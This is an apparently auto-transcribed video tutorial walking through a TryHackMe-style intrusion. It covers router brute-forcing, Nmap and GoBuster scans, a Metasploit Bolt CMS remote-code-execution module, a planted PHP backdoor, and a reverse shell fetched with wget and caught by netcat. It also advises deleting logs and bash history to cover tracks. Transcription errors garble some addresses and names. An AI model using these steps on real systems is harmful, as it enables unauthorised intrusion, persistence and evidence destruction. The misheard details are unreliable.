Hi and welcome. So today we're going to talk about how to hack. Now it's a pretty big question and I want to try and answer the question for you in the most easy and yet comprehensive, in a way shortened down to some sort of small model that you can understand and grasp without it being a very long video that take like hours to get through. So the first thing I want to talk about is what is hacking, because when people say I want to hack something, they usually tend to just think it's something you run a tool and that's about it. Well, in many cases that is also true, that you use a tool and yourself in order to get to the successful rate that you need to do. So let's assume that what you want to hack is this iPhone, for example, that I have right here. Now, in order to hack an iPhone, for example, this is just one device out of many devices. You need to connect this device to a computer that you control. And then you need to do a lot of things to this phone here. Now, you could run a lot of automated programs that just attacks this phone. Now, I'm trying not to go down into technical talk in the first place, but you could run different programs. Now, if you do that, that would necessarily not mean that you're not hacking. You are probably trying to hack it. But are you trying the best, or could you do better? The answer is no, you're not doing your best. And yes, you could do it better. The better way to hack a phone would be to actually directly interact with it through some protocols and different kind of things that this phone has set up. Now, in order to understand how to do that, you need to know what a protocol is. And a protocol is basically a way for a computer to communicate with others in a settled way, so we all know a standard way to communicate with this particular device. For example, a web page. You communicate with a web page through a protocol called HTTP, Hypertext Transfer Protocol. That particular protocol is only for web. You cannot hack a server using HTTP. You need to do more than that, but you can execute different kind of hacks on a web page using HTTP. Now, if you can leverage that along with some other insecurities that might be on the server, you could maybe escalate that a bit further. Now, what I'm talking about is just a lot of things, and if you already now think, but I don't understand the HTTP, what network is and all that kind of stuff, well, there is a certain level of knowledge you need to possess before you can go on with hacking. So if you already now feel a bit confused about the HTTP talk and the talk about the server and how can you leverage this to something more than that, you should probably take a step back and do some network courses. Network courses will give you the necessary knowledge to understand different kind of protocols, how computers work and how they communicate. Basically, hacking is all about is to misuse that communication a computer can do with others or you or through your computer. Well, this is what you can do with hacking. But what can you do with hacking then? You can get access to materials. Now, the most important part a company have is the data, for example. So if you can get access to a company's data through something, that would probably be through a web application or an insecure database. There are so many things that can go wrong and that you can hack in a way. But just because I say that you can hack, it doesn't mean it's hackable. Sometimes things are just not hackable, not the way that you would like it. Maybe it is not vulnerable directly. Maybe it is not vulnerable indirectly. Maybe it's not vulnerable at all. Maybe they shut it down that good that you actually need to attack something different. And this brings us back to the actual talk about passwords. So a password is very important. Weak passwords is the number one thing that's causing all the compromised services, servers and devices on the internet. Because weak passwords are easy to attack. It's easy to guess them. Let me just tell you why. Now, there are programs that can automate really fast guessing passwords for a particular user. If you know a username to something, it is really easy for a program to just say, is that your password, is that your password, is that your password, that's your password. Really easy, like do. It's called brute forcing. Now, of course, it can be difficult sometimes to brute force a service because that service got some countermeasures. But let's now assume, just for a brief moment, that you got your hands on the encrypted password saved in the database, also called the hashes of the database that contains the passwords, right? So you got your hands of those. Now you don't have the disadvantage by asking the server or the victim all the time, is this your password, is this your password, is this your password, and maybe getting locked out because of some countermeasures. Now, in this particular example, you have your own machine, and you can use all the time, all the machine power, all the cloud service you wish to rent and pay for if you wish to do that, just to hack the simple hash, meaning by you got access. Alright? So, if you got the hash, you can crack it, I guess you can call it, but you can guess the password for the hash, because a hash is not reversible, non-reversible. So, it's a one-way encryption, as you also call it. Anyway, so if you got the hash, then you can break it, then you can get access, and then basically you can probably own the server pretty fast. Okay, so now that we talked about different kind of things and insecurities, I kind of laid the ground for what is hacking and what you need to think about. I'm gonna go back to the idea of looking at this network here. This network here represents a standard network. It could be something at home. Now at the home you have your computer. You maybe have some scanner or network printer. You maybe even have some Wi-Fi access point, a laptop, maybe another computer. All that is connected to some sort of network interconnective device. Could be a switch, whatever it is in this particular case. Could also be something else. It could be that you had a firewall in between. It could be a software firewall. In most cases, if this is at home, it's a software firewall. If this is a small company, it's probably also just a software firewall. I don't see small companies buying hardware firewalls, which is an actual case that is only a firewall. I don't really see that. So, what you should think now is like this router. And this router is the actual endpoint before you go on the internet. Now, if you go on the internet, then you are outside your own network and nothing of what configuration and security you have created on your end, on the back end here on the left side of where I draw the line with my mouse, is not secure anymore for you. So, this is your network. Let's now think that we are the hacker. So how to hack this network? You come from the outside and you want to get in. The first thing you need is this router. Alright? And this router could also contain a software firewall. The firewall could be after it. You really do not know. Now, if you look at this router, the very first thing that happens is that you go in through that router and you get access to whatever device that is, open to the internet. If there is a device, let's now assume for a brief moment that none of these devices is open to the internet. Now, how can you connect to them? How can you get access to it? Well, let me put it simple. You cannot just get access to the device if it's not put on the internet. Let's assume this scanner here. You as a hacker outside want to send a picture of a cat to this scanner and print it out. Sorry, this network printer. Then how would you do that? Well, necessarily you cannot do that because the network printer would be on a network, and that network would be created by the router, and that network would be created on the inside of the router. And when you get to that router from the outside, if you have no direct way of communicating inside, you cannot get in. So already now you're locked down. So what do you need to do? Well, you need to hack the router, basically. So if there's no other way, you need to hack the router. What can the router present to you? Now, in many particular cases, a router will present to you a user interface. Usually go on the internet something like 182.168.1.1. or you maybe do 0.1 depending on which kind of router you have. Now this is a virtual machine, so it's not really in direct interface with that, but you usually access your router on your home network through an IP address just like that. They can be different. You have to look at how your router is configured and what IP it has. Sometimes it's a 1 there, sometimes it's 100, and you know, basically you have to look, but there are default addresses, which is usually called the default gateway. Alright, so when you get access to the router, you will try and brute force that router's interface. That is possible by just trying passwords. But you can also skip the brute forcing and say, what can I do more than that? Well, you could try and find insecurities in the firmware. So if you can get the firmware version of whatever is on the router, you can look for exploits. And there are different ways to do that. Now, I'm not going to go into details on how to find exploit right now, because you can basically just go to Google and type, if this was like a TP router, go to type TP router exploit and then some version and press enter, and you should just start searching by that and going through it all. Now let's assume that the router doesn't contain any, you know, there's no vulnerabilities for this particular firmware. What then? Now it becomes a bit difficult because you need to get in. They need to get successful on the brute force. If you can get successful on the brute force, and let's assume just for the sake of this video that you do get access to the router now, then you can see the interface of the router. Now you can connect directly to it, and you can also connect to the network and be a part of it, and basically let this router tell the firewall, if there's a firewall, that you are legitimate traffic, and then you can get access, and then you can start port scanning the network. This is the most important part. Before you can do anything, you need to be a part of the network. So you need to get an internal IP address that works inside of this network. And if you can do that now, well, then you have access to the network. And that's it, really. So if you have access to the network, you can start doing some port scanning and different kind of things. Now, let's just assume for a brief moment that there is a web server actually inside of here. This is the web server of this machine here. But it was not exposed to the internet. So now that you scan the different machines and find the IP addresses there is, you do some sort of ping sweep. So you tell something like Nmap that you want to do a ping sweep. It could look something like, you know, that you did something like Nmap, and then you did 10, 10, 0, 0, and then dash, let's say 24, and then you did like something like that, and then you ran the command. Now, if I do something like this on my computer, I'm not going to get any success because I have no machines with this particular IP address. So Nmap will then return to you with a different kind of machines it found on this particular network. And then basically you can start port scanning those IP addresses by using Nmap and look for particular services and use default scripts and do aggressive scans and whatever you're going to do to find even more stuff to try and exploit. Now in essence, what you're going to look for is like services running on computers. Service is just a program. Everything is a program. Nothing is not a program. Everything on a computer is a program running. Even though you call it a service, you call it a server, call it a client, they're all just programs running. But you give them different names because it's easy to talk about a service, because a service is not directly a program in your mindset, because a program is more like something like Word, and a service is something you use through Word, for example. But yeah, you can say it like that. But everything is just a program. So basically, you're going to try and find insecurities in those programs running on different computers, and then search for exploits, see if you can exploit the vulnerabilities, and so on and so on. Now, you might not find something, or you might find something. That is the case. I don't really know. So this is really what you're going to do. So, but for this particular step, now we're going to go one step back and say, what is the hacking methodology you could use? Now, you started reconnaissance. Always you go ahead and do some reconnaissance and look what you can find. I talked about that throughout the whole videos, like you gotta find something, look for something, exploit something. And when you got access, or maybe you don't have access, you start scanning and look for stuff that is there for you to find vulnerabilities to. If you can do that, you can hack them, maybe, and gain access, maybe, depending on how good it's configured. Now, you have to combat stuff like, least privilege. And when you get access, that's very, very normal stuff. If you are any hacking site like TryHackMe, Hack the Box, it's a whole thing of privilege escalation. The whole thing, you just need to go into that, and everything is about priv escalation, and this is what you're gonna meet. So least privilege is about using the least amount of privilege for a user to that particular job you're doing, or program you're running on the server. When you gain access, you need to maintain access. Well, this is the two last steps in the hacking methodology. It's more like if you want to maintain the access. Now, maintaining access could be opening a port, for example, or creating a service that tries to connect to your own machine every 1 day, or leave something open that you can connect to, start a program that is able to communicate with, create a service, something. Covering tracks is, in most occasions, deleting your log files. It is deleting your temporary tracks, stuff you type. If this is on a Windows machine, it's gonna be difficult. If it's on a Linux machine, did I say Windows? Windows is difficult. On a Linux machine, a Linux machine, how we're gonna call it, there are different things like bash history and other kind of files you need to clear. Also log files, web logs, system logs, firewall logs. The same applies on the Windows machine. It's just difficult to do that. So this is really how you're gonna go ahead and cover this methodology. So let's go ahead and just assume that now that we have access to the network, we get access to this particular web server right here, and we type in the IP address in our browser, and we see like, okay, so installed an Apache Ubuntu default page. So let's just install some Apache server. And this is probably the case that maybe this company right here, if it's a company, we don't really know yet. It could be, I said this was a private network, but it could be that they want to, the people that own this private network want to put this particular machine on the network as a web page selling, I don't know, t-shirts. Let's just assume this for now. Then you see stuff like this and like, yeah. So what you're gonna do is start enumerating and go one step back. So you go back to hacker's methodology and say, I need to do more reconnaissance now. So you're gonna take this particular IP here and say like, okay, so let's go into this. That's a big, and let's do a GoBuster scan on this particular service here. And a GoBuster scan is basically just a directory. Let me just write this before this is really big. A directory scanning tool. So it's gonna scan for directories and stuff on this particular what we call IP. Now we don't know if you find anything. We don't really know, but it might find something. So while we run this, we can do even more. We can go ahead and say like, but I also want to do an nmap scan. Just do standard nmap scan. No particular big things, just standard scripts and standard version, just like that. And this is also gonna, scan the machine even further. So now you're scanning the actual web server on the network. Now this is really good. Let's see if GoBuster found anything. It doesn't look like it found anything so far. So while this is running, we should definitely look at this and say like, yeah, it looks pretty good. And you don't see anything in particular here that's interesting. So you're kind of stuck to the idea of, do I find something? So now that the nmap scan is done, it kind of found a new port. So you've been testing on port 80. This is port 80. This here is port 80. Port 80 is used for standard HTTP traffic. Now they haven't installed HTTPS, so no TLS certificate at the moment. So what you're gonna do now is say like, but the nmap scan just returned in my reconnaissance phase say like port 8000 is open. It's like, oh, so they have a sneaky web server on the machine. So now that we scanned this particular network and know that port 22 for SSH is open on this machine, well, okay, we have port 80 open on a web server. Maybe they haven't done anything to it. They haven't done anything, but there is a port 8000 open as well. It's like, okay, let's go access that. So it's a code on 8000. And now you see like, oh, they are building some sort of web page. Okay. So now we're gonna go stone step back and say you found the web page through reconnaissance. You're gonna stay at the reconnaissance phase now because you do reconnaissance on the web page. Now in this particular case here, you're just gonna try and scroll down and find out what is this. This is a CMS system built with a CMS system called Bolt, and basically what you see here is that since this machine is on a private network right here, they didn't think that I would brute force their router, but I did brute force the router. I got access to the network. I'm a part of the network now. So they didn't really think about security on their web page, and this is of course very normal because we're just behind something. Now their problem was that the password was insecure and weak. That was the reason why we got access to the network. Okay, if they had a great password, they would have known that they would probably not have to fear getting this exposed. But now that they did, and they did something like, okay, so you can see that there is an admin here, and you can see that there is a password called boldadmin123, and basically you see that this username is called bold here, and you can read that. Then you could go ahead and get access to the web page using those credentials, right? So if we go ahead and look at this now, what is the admin login for something like bold? Now you're gonna try stuff like, okay, so is it admin? And just like, yeah, it's not admin. If you go ahead and search, you know that you find pretty fast that it is called bold. Now they access that. You can go ahead and just put in the credentials you just found, just like bold and bold admin123, and then you have access to the particular backend of the web page. Now, what can you use this for? First of all, you're getting the version called 3.7.1, so now you can go ahead and search for exploits that is about this particular CMS system. Going one step back, we did reconnaissance, and we haven't scanned the application yet. We stopped scanning the application. So let's go back just here and say, did we still run the scan? We are. So we're gonna say like, okay, so now we need to gain access. And by doing that, we need to run some sort of program that can access the application, exploit this particular software, if it's possible. So what we need to do now as hackers say, okay, so we got access to this web server here. We have access to the admin panel. We can of course harass them now by writing, you know, different kind of stuff and uploading hilarious cat pictures to the web page and saying ha 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 ha, you know, stuff like that. All right. But we're not going to do that. We will get further down. We will want access to the server in some sort of terminal way. So we need to have like terminal access, so I can access the actual operating system, get access to everything. In best case, I want root access, which is the same as superadmin. So I go to the interwebs. Actually, I go ahead and boot up a tool, but it's just like bold CMS 3.7.1, and then write exploit, and you find something at the same moment on ExploitDB, which is an excellent site to search for exploits, and this is called authenticated remote code execution. That is the most beautiful thing I've seen for a very long time. Authenticated means that if you have a user you can log in with, we do. Remote code execution, oh, I can execute code on the server. There's a script here I can use. But I can also go ahead and boot up something called Metasploit. Metasploit is basically an exploitation framework that in most occasions contains the exploit that is on ExploitDB. So we can go ahead and type cert bold CMS, and you will find this authenticated 3.7.0 or 0.1 or whatever, which is the first exploit right here. What you see here is actually the actual exploit path and the exploit right there, the day of creation. It works really good. They checked it, and this is particularly the description for it, and it got the exploit number of list number 0. So let's write use 0 and then write show options. The options here is what we're going to present it with. We need to fill out with a password and a username. Sure, so set username, bold, set password, bold, admin123, and we also need to set the R host. And the R host is the target host, so that is the IP address of the server. Let's go back here and find the IP address of the server. It is right there. Paste it to a document, just like that. Go back, paste it in, and let's see. We also need to set the L host, which is me. So L host, which is my machine 10 11.0201, and I don't think we need to do anything more because the port is also 8000, the target port. You see that it's already filled out. So what we could do now is basically go ahead and write exploit, and it will run the exploit and give us back attempting to execute the payload. Command shell session 1 opened. We own the box now. I can write ID. It showed me that I'm root. What is this? Who am I? I am root. Okay, so ls. Okay, let's see, /home. I'm on the server. So I see that there is a folder called bold. And here I see the different things that we look at. This is the actual web page, the index web page. Let's go ahead and say heads index PHP, and we see something like installation error, you know, stuff like that. So we have access to the web server. We own it. We are root. We have access to everything right now. Now in this particular case, we go one step back and say we have access. We don't need to do any of the other ones here, like maintaining access and covering tracks. Well, maintaining this particular case is that we could upload a backdoor. We could do that. We could do something like go to Google and write PHP symbol command backdoor like this. And just take this one line of PHP right there, and then go to the server and write. Let's just see where we are. We're the index, and just echo this particular code. I think we need to, yeah. So, oops. Let me just exploit again. I just shut myself out. So let's re-exploit it. So this is also another thing you might have in some time when you use these kind of exploitation. So there. Index, one step back, and let's see var, and let's go to dot, you know the path, HTML, and there's an index page. Now let's just say echo hello to a file called hello.txt, and then go to the actual web server now. And you take the IP address here and say, is this particular case? No. No. Is it the right port? There we go. So we actually upload the file directly to the normal Apache server. So we can also try stuff like, then do like PHP echo hello, just like that, and then to test PHP and go back. Can this execute PHP code? And it can. So now that we know that it can execute PHP code, we can go back, copy paste this particular shell here. I mean, not shell, sorry. It's a small script that can execute commands, and do echo, and then pipe that directly to shell.php. We go back, and then we do shell php. I'm gonna give it a command equal ls, and now we can execute commands directly on the server. So we even exploited it further, and now we can just say this is our way in, because we can make it access our own machine. So what we could do in particular is just go ahead and say, now we have this, let's just shut this down. Let's go to, I think there's a shell right here. I have a shell. And this particular shell is just a PHP shell, some piece of code that I can upload on the server that I just created the command executional interface on, and call this particular script called shell.php. So let's move it to s.php. Sorry, move shell.php to s.php. Now, I don't have my original shell right now because I needed to have a different name. So I can open up Python now and say I start a web server on my own machine, so I can download the s.php now. So let's go ahead and do that. So let's just do wget http there, then 10.11.021:9000 /s.php, and it seems like it's downloaded. So let's go back here and the ls, and no, so maybe it is there. Let me just verify by creating a netcat listener on port, I think, I'm not really sure. Let's just see more s.php. It is port 444. Okay, so let's just start the Python web one time. Start netcat listener on port 444. A netcat listener is a program that can listen for an incoming connection. So now that we opened that, and we should be able to do s.php. No, it didn't get it. So let's just do a, can I do wget? No, it's not really sure that I can. If I'm not able to do a wget command right here, then we need to, let me just say, :9000 /sphp. If I cannot do this right here, then I need to create this particular shell throughout the other program, or through the other program that I have. So let me just go back and say, let's open Metasploit console one more time. So if this is not possible, we can also go ahead and type something like echo and do test and see, can we actually do something like hello.pdf? Can I do that? And it seems like it doesn't want to do that. Can I touch files? Touch A. It doesn't seem like it's gonna do anything. So we are kind of limited right now to calling stuff directly from here. So let's go back to this one here and call search bold CMS use 0 clear screen show options one more time, and we're gonna set the username to bold and set the password to bold admin123 and set localhost to 10.11.0.2.1 and set our host to, let me just take this IP there, and we can also type run instead of xprops already used. Our address is already in use. Where is this? Run. There we go. My other window had it. So we're executing one more time. And this case, in this particular case now, we're gonna go here and copy paste this particular code now. Not that code. We're gonna, where was it? So we're gonna go here and go to my machine, do sphp. This is what I want to upload. So I start my Python web server, and now I want to upload that script to the server. So I go to var/html, and then I do stuff like wget http://10.11.0201, and it. Oh yeah, I forgot the port number. It's very normal of me. So, whoops. Okay, let's run one more time. I accidentally. This is the pain. When you got access, you need to make sure you have it. Now I'm just trying to shortcut it. So var, and then do wget http://10.11, which is my IP address, :9000/hpp, and it seems like that we have it right now. So what I could do is go ahead and shut this down here, right there, and then go ahead and start up Netcat Listener. Go to my web page right here and say update. The SPHP is right there. Call it, and you see the web server is now hanging and the browser is hanging. Going back, we'll see we got a shell, and we are .data. We're not root anything. So now that we have that, we can even further go ahead and try and privilege escalate ourselves to that, you know, user we had before. So I think I want to stop the video right now, because what we did is gaining extra access, maintaining our access. We didn't look at the, where was it one more time, covering tracks, because it would be too much to cover. I have no control of the server. It's something on another server called TryHackMe. I don't want to fit with the servers too much, but this is just, you know, the way it would be looking, and this is what I would be doing. Now I really hope you learned something from this video, because it's just never the same. It's always different. Hacking is always different, looks different, it is different, different way, different access, different exploits, you know, so please think about that. And until next time, I hope to see you again. Have a really nice day and have a happy hacking day.